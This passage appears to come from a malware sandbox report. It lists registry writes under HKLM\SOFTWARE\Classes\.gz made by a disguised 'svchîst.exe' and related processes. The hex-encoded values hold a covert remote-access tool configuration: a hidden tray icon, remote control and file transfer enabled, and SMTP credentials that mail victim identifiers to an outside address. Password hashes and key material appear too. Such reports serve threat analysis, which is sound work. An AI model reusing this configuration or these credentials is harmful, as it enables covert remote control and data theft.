6230704c54336c456248563263555261516b744363573548643074435a31464554475a56563370515a555531566b64734f55597755315669536b733355565176513239595257633255464935436b6b324d465676654770716547644556334e364e334e6a535731356133566e5a446835517a4d3054564e4b5a6b393065565a6d52485276536a4671625746544b334679516b73304d5339544e6d744a626b70436445554b55484977646d5a31516e4e5a555846365a554e4b62566b325245557652456c755333453262444d7754445a70557a4e495a6b3974595670474f466c434e6d7335566b35534e6b633553305656616d39474e5649325267705a64556c4d4d7a4a444c32465253304a6e55554d3063306376575578526158673453576b7a526a5649624752545954524d63545a6d57485644596c7074646c55726132315752466c32556d4e455a6b39585156686a436d686a52446c3465464a36525642475546645751574a724f564e31544768484e6a6847533056755232645364556b77566c45304e6e6456617a4e4e5647704d4e446477566a6857596b6c444f45465663464533646a594b656b70324f47314752484e4552445a59645864474c7a6861616e4e425447396d617a5977654535444b30746e534446574d6d4a6c546e5a78513055725257704b64555659546d354f536b7071643074435a3146444b777077626a5261545441335245466b4d574a324b303159526b74775a45643354446376574739686246646e54473530546c6b785344564d56316c5a544739705245464e59576434565646614f4731514c7a686f4d304a6a436c4e475a6d3431596b557a56576861616a644f4d6a4e695a304e4451316c7654437446546b647554553959533368716146645255544e53635868614c32464b6446413459585a445355744e647a5a686144646e4d6a514b4e474a4863326735534856514d45464353317034593368424c316330516a5668636e686c516a4274636b6c48614468715a456c525632745253304a6e5555523256335a6a5647567a55554e6c65474a6b6354497264517046626a6c3164484976553067334f574e3161574e324d58567165474e6c5a6a4d78556b467a56326c72516d6c54556d39365557747955574656646e466a546c464861465a4263325932526b63315330523657486479436b6b3161484a525a7939734b336b72534756744e6d5a4a616b786a536b783157565248537a59315555524e636d707264546372527a63776456427a4f44466862334679567a526d556b46786243387862476c704e6b634b566d686a4d6d63304b3370694e6e684d525339774e69744864303542546a42326345453950516f744c5330744c55564f52434251556b6c575156524649457446575330744c53307443673d3d3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e66616c73653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\CalendarRecordSettings = fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600390031003100300022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00 | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3832352d3433362d3835372d3835333c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e747275653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f